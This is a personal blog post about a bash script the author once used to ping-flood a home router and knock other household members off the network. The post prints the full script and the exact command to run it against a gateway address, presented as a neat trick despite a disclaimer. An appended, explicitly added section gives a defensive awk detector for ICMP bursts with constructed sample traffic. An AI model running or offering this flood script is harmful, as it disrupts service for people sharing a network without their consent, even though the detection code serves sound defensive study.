Disclaimer: The following article is written for entertainment and educational purposes only. Neither the script shown here nor any of the techniques involved are intended to be used in real life. Launching denial-of-service attacks is illegal and can get you in serious trouble. I do not condone or support any use of such hacking methods for anything other than pen-testing purposes.
Haven’t written anything about either pen-testing or Linux shell scripting recently, so I thought I’d share a neat script I wrote several years ago that I used to use quite frequently. Back when I was a young whippersnapper in my early twenties and living with my parents in a house with a crappy Internet connection, I used to fight endlessly with my family members over bandwidth. Not in the sense that I was arguing with them over it, but in the sense that I was launching covert attacks to kick them off the network so that I could get more bandwidth for myself. It could get annoying trying to connect to a site while someone else was hogging all the bandwidth by streaming video in another room, so I thought why not disrupt their connection so that I would be allowed through?
The following script works by launching a denial-of-service attack against the local router. It sends a timed ping flood which overloads the router and causes it to go temporarily offline, effectively kicking everyone else off the network. The script will wait for a certain duration and then stop the ping flood, and at this point you’ll be able to get a request through because you’ll be the only one on the network. I know ping flooding has been rendered largely obsolete by the introduction of better DDoS protection with services like Cloudflare, but the attack I devised should still work, because there is no DDoS protection built into small home routers.
The script looks like this (just remember that I don’t condone anyone using it IRL):
```bash
#!/usr/bin/env bash
# Local denial-of-service script

host="$1"
shift
declare -i npings=50
declare -i duration=5

# Set parameters:
while getopts ":n:t:" opt
do
    case $opt in
        n) let npings=$OPTARG;;
        t) let duration=$OPTARG;;
        \?) echo "Usage: source dos.sh host [-n npings] [-t duration]" >&2;;
    esac
done

# Launch DoS attack:
for (( i=0; $i<$npings; i++ ))
do
    ping "$host" > /dev/null &
done

# Wait and stop attack:
sleep $duration
killall ping

# Cleanup:
unset opt i host npings duration
```
The script would be run at the command line with a command like this:
$ source dos.sh 192.168.10.1 -n 50 -t 5
Wait $duration seconds for the prompt to reappear, then do whatever you want to do on the network. ($host should ideally be the IP address of the local WiFi router; I just used a common default gateway address as an example. Since it’s a local IP address, you can’t actually use it to attack anyone on the Internet.)
I know I could have used the -c $duration option here, but if you were to actually use this in real life (which, again, I’m not suggesting anyone do) you would quickly discover a problem if this method is used, which is that you wouldn’t be alerted when the ping flood is finished, so you wouldn’t know the proper time to put your Internet request through. Using killall makes things easier, because you can just wait for the prompt to reappear.
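Seen from the network side, the script leaves a simple signature: one LAN host sending many ICMP echo requests per second to the gateway, where an ordinary ping sends one. The following is an added example, not part of the original article: it reads `tcpdump -n -tt icmp` style text lines and reports sources whose busiest second exceeds a threshold. The function names, the threshold and the sample addresses are assumptions, and the capture lines are constructed.

```shell
#!/usr/bin/env bash
# Added example (not from the original article): flag LAN hosts that send
# ICMP echo requests to the gateway faster than a threshold.
# Input on stdin: text lines in the format printed by `tcpdump -n -tt icmp`.

# detect_icmp_burst GATEWAY MAX_PER_SECOND
# Prints "source peak_rate" for every source whose busiest one-second
# bucket holds more than MAX_PER_SECOND echo requests aimed at GATEWAY.
detect_icmp_burst() {
    local gateway="$1" max_pps="$2"
    awk -v gw="$gateway" -v max="$max_pps" '
        # Field layout: ts IP src > dst: ICMP echo request, ...
        $2 == "IP" && $4 == ">" && $6 == "ICMP" && $7 == "echo" && $8 == "request," {
            dst = $5; sub(/:$/, "", dst)
            if (dst != gw) next           # only traffic aimed at the gateway
            sec = int($1)                 # one-second bucket
            n = ++count[$3, sec]
            if (n > peak[$3]) peak[$3] = n
        }
        END {
            for (src in peak)
                if (peak[src] > max) print src, peak[src]
        }
    ' | sort
}

# Constructed sample capture: 192.168.10.23 has 50 ping processes running
# (50 requests in one second); 192.168.10.42 runs one ordinary ping.
sample_capture() {
    local i
    for i in $(seq 1 50); do
        printf '1700000000.%06d IP 192.168.10.23 > 192.168.10.1: ICMP echo request, id %d, seq 1, length 64\n' "$i" "$i"
    done
    for i in 0 1 2; do
        printf '170000000%d.500000 IP 192.168.10.42 > 192.168.10.1: ICMP echo request, id 900, seq %d, length 64\n' "$i" "$((i + 1))"
    done
    # Echo replies must not be counted.
    printf '1700000000.600000 IP 192.168.10.1 > 192.168.10.23: ICMP echo reply, id 1, seq 1, length 64\n'
}

sample_capture | detect_icmp_burst 192.168.10.1 10
```

On a live network the same function can be fed from a capture taken on the router or a mirror port; the threshold of 10 per second is a starting point to tune against normal monitoring traffic.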
Well, that’s about all for today. This article was a little shorter and less involved than what I usually do, but I think it was a good break from routine. Farewell and happy hacking!